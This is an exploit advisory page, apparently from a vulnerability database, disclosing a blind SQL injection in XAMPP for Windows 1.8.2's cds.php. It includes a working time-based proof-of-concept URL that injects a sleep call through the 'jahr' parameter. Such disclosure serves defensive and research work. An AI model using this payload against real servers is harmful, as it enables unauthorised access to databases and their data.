XAMPP for Windows 1.8.2 Blind Sql Injection

2013-11-01 / 2013-11-02

Credit: Sebastian Magof

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection
# Date: 2013/10/28
# Exploit Author: Sebastin Magof
# Vendor Homepage: apachefriends.org
# Software Link: apachefriends.org/en/xampp-windows.html
# Version:1.8.2/1.7.7
# Tested on: Windows
# Twitter: @smagof
#Greetz: Family, Friends && Under guys;
#Special Greetz: My Alpha (:
#Description:XAMPP is a platform-independent server, free software, which
mainly consists of the MySQL database, the Apache web server and
interpreters for scripting languages: PHP and Perl. The name comes from
the acronym for X, Apache, MySQL, PHP, Perl.
#Sql-Injection: An attacker may execute arbitrary SQL statements on the
vulnerable system. This may compromise the integrity of your database
and/or expose sensitive information.
#Vulnerable file: cds.php
#Parameter: "jahr="
#Exploit:
http://127.0.0.1/xampp/cds.php?jahr=1967 AND
sleep(3)&interpret=1&titel=555-666-0606

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

XAMPP for Windows 1.8.2 Blind Sql Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.